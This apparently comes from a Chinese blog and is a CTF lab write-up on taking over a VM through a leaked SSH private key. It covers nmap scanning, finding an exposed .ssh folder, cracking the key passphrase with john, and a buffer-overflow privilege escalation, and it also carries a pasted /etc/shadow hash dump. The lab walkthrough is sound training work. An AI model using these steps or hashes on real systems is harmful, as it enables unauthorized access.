CTF实战(一):SSH-私钥泄露

ssh-私钥泄露

靶机地址:https://pan.baidu.com/s/1mLw3yuqardX3f1F0ocPmkQ

1.主机发现

这里使用了一下二层发现工具netdiscover(netdiscover -r 10.10.3.1/24),发现即使是主动发现也不能准确探测所有足迹,折腾了一段时间,最后还是用nmap的主机发现命令扫除了漏洞机(nmap -sP 10.10.3.0/24

2.服务扫描

这个简单nmap扫一下就出来了
nmap -sV 10.10.3.102
wyt

3.http服务探测

wyt

1.探测31337端口开放的服务发现需要进行一下目录扫描
wyt
2.发现了两个敏感目录.ssh和robots.txt
wyt
wyt
3.拿到第一个flag,再看第二个.ssh
wyt
4.最后发现http://10.10.3.102:31337/.ssh/id_rsa.pubhttp://10.10.3.102:31337/.ssh/id_rsa可以下载到本地
5.利用私钥连接服务器
查看用户名:cat id_rsa.pub
ssh连接:ssh -i id_rsa simon@10.10.3.102
6.需要输入密码,于是想通过john破解密钥,首先将私钥转化为john可识别的hash文件这里用到一个工具sshng2john这是一个python脚本https://github.com/truongkma/ctf-tools/blob/master/John/run/sshng2john.py
python sshng2john id_rsa > tmp
7.利用zcat加载字典,利用john破解密钥
zcat /usr/share/wordlist/rockyou.txt.gz | john --pipe --rules tmp
8.得到密钥为starwars,登陆
9.进入root目录
10.查询发现有两个文件
wytflag.txt
11.cat flag.txt发现无权限
12.cat read_message.c 发现第二个flag,同时发现存在缓冲区溢出漏洞
wyt13.20个字节
这里发现read_message已经被编译存在于/usr/local/bin目录下,直接运行
SimonSimonSimonSimon/bin/sh即可提权
wyt
拿下flag3

总结

第一次接触ctf感觉还是挺有意思的,感觉还有好多东西要学习,方向的话还是觉得对抗和mixed更有趣一点。

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
root:$6$RMpgG8z.$GrGzDK0J1/uXc/Z2WIp6WgIYEB6Bi/Sw2aCc86U2E.BK80mszROf4K1ZB172DOQzgRb6U/2jGPh/8rwXQsbM3/:17277:0:99999:7::: daemon:*:17272:0:99999:7::: bin:*:17272:0:99999:7::: sys:*:17272:0:99999:7::: sync:*:17272:0:99999:7::: games:*:17272:0:99999:7::: man:*:17272:0:99999:7::: lp:*:17272:0:99999:7::: mail:*:17272:0:99999:7::: news:*:17272:0:99999:7::: uucp:*:17272:0:99999:7::: proxy:*:17272:0:99999:7::: www-data:*:17272:0:99999:7::: backup:*:17272:0:99999:7::: list:*:17272:0:99999:7::: irc:*:17272:0:99999:7::: gnats:*:17272:0:99999:7::: nobody:*:17272:0:99999:7::: systemd-timesync:*:17272:0:99999:7::: systemd-network:*:17272:0:99999:7::: systemd-resolve:*:17272:0:99999:7::: systemd-bus-proxy:*:17272:0:99999:7::: _apt:*:17272:0:99999:7::: mysql:!:17272:0:99999:7::: epmd:*:17272:0:99999:7::: Debian-exim:!:17272:0:99999:7::: uuidd:*:17272:0:99999:7::: rwhod:*:17272:0:99999:7::: redsocks:!:17272:0:99999:7::: usbmux:*:17272:0:99999:7::: miredo:*:17272:0:99999:7::: Debian-snmp:!:17272:0:99999:7::: ntp:*:17272:0:99999:7::: stunnel4:!:17272:0:99999:7::: sslh:!:17272:0:99999:7::: rtkit:*:17272:0:99999:7::: postgres:*:17272:0:99999:7::: dnsmasq:*:17272:0:99999:7::: messagebus:*:17272:0:99999:7::: iodine:*:17272:0:99999:7::: arpwatch:!:17272:0:99999:7::: couchdb:*:17272:0:99999:7::: avahi:*:17272:0:99999:7::: sshd:*:17272:0:99999:7::: colord:*:17272:0:99999:7::: saned:*:17272:0:99999:7::: speech-dispatcher:!:17272:0:99999:7::: pulse:*:17272:0:99999:7::: king-phisher:*:17272:0:99999:7::: Debian-gdm:*:17272:0:99999:7::: dradis:*:17272:0:99999:7::: beef-xss:*:17272:0:99999:7::: xrdp:!:17472:0:99999:7::: lightdm:*:17472:0:99999:7::: ctf:$6$d1Y17YhS$P1G.pKFO6VKvKx.y0H7nP5kXAHUAhj6hYroEA.ThT1/kErw37IhVclt.UWCFXrfq/sEZk1jhb52KlPWidJKpp0:17473:0:99999:7:::
07-13

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值